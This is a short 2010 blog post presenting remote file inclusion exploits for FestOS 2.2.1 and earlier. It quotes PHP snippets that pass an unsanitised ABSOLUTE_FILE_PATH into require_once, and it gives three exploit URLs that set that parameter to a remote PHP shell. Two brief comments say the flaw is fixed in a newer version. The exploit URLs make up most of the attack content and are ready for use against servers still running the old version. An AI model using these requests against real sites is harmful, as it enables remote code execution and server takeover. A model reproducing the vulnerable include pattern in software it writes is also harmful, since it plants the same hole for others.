FestOs <= 2.2.1 Multiple RFI Exploit
2 Comments
January 11, 2010, 11:21 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
~ Code : [reports_placement.php]
<?php |
$title = "Jury Sheet Report"; |
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php'); |
if($_SESSION["roleID"] > $reports) { |
header("Location:index.php"); |
} |
include "includes/reportheader.php"; |
?> |
~ 3xplo!t : |
[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell] |
~ Code : [FestOS.php] |
require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php"); |
~ 3xplo!t : |
[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell] |
~ Code : [reportheader.php] |
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php'); |
~ 3xplo!t : |
[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell] |
and more...
Advertisement
2 Comments
Fixed in newest version.
Comment by Skypanther January 12, 2010 @ 2:45 pmwhat is the latest version now?
Comment by admin January 13, 2010 @ 10:45 am